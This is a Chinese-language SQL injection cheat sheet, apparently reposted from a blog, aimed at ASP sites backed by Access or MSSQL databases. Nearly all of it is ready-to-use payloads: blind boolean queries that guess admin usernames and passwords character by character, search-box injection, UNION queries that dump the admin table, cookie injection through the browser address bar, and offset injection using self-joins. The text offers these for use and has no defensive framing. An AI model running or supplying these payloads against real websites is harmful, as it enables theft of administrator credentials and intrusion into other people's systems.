注入语句详解(get注入，cookie注入，搜索型注入等)

注意：对于普通的get注入，如果是字符型，前加‘   后加 and ‘‘=‘ 
拆半法 
###################################### 
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库，MSysAccessObjects是ACCESS的默认表。 
and exists (select * from admin) 
and exists(select id from admin) 
and exists(select id from admin where id=1) 
and exists(select id from admin where id>1) 
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 
and exists (select username from admin) 
and exists (select password from admin) 
and exists (select id from admin where len(username)<10 and id=1) 
and exists (select id from admin where len(username)>5 and id=1) 
and exists (select id from admin where len(username)=6 and id=1) 
and exists (select id from admin where len(password)<10 and id=1) 
and exists (select id from admin where len(password)>5 and id=1) 
and exists (select id from admin where len(password)=7 and id=1) 
and (select top 1 asc(mid(username,1,1)) from admin)=97 
返回了正常，说明第一username里的第一位内容是ASC码的97，也就是a。 
猜第二位把username,1,1改成username,2,1就可以了。 
猜密码把username改成password就OK了 
################################################## 
搜索型注入 
################################## 
%‘ and 1=1 and ‘%‘=‘ 
%‘ and exists (select * from admin) and ‘%‘=‘ 
%‘ and exists(select id from admin where id=1) and ‘%‘=‘ 
%‘ and exists (select id from admin where len(username)<10 and id=1) and ‘%‘=‘ 
%‘ and exists (select id from admin where len(password)=7 and id=1) and ‘%‘=‘ 
%‘ and (select top 1 asc(mid(username,1,1)) from admin)=97 and ‘%‘=‘ 
这里也说明一下，搜索型注入也无他，前加%‘ 后加 and ‘%‘=‘ 
对于MSSQL数据库，后面可以吧 and ‘%‘=‘换成-- 
还有一点搜索型注入也可以使用union语句。 
######################################################## 
联合查询。 
##################################### 
order by 10 
and 1=2 union select 1,2,3,4,5,6,7,8,9,10 
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin 
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1 
很简单。有一点要说明一下，where id=1 这个是爆ID=1的管理员的时候，where id=1就是爆ID=2的管理用的，一般不加where id=1这个限制语句，应该是爆的最前面的管理员吧！（注意，管理的id是多少可不一定哈,说不定是100呢！） 
###################################

cookie注入 
############################### 
http://www.******.com/shownews.asp?id=127 
http://www.******.com/shownews.asp 
alert(="id="+escape("127")); 
alert(="id="+escape("127 and 1=1")); 
alert(="id="+escape("127 order by 10")); 
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")); 
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
这些东西应该都不用解释了吧，给出语句就行了吧。这里还是用个联合查询，你把它换成拆半也一样，不过不太适合正常人使用，因为曾经有人这样累死过。 
###################################

偏移注入 
########################################################### 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id) 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id) 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) 
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on 
a.id=d.id) 
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id) 
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

转载自：http://tiwson.iteye.com/blog/1919349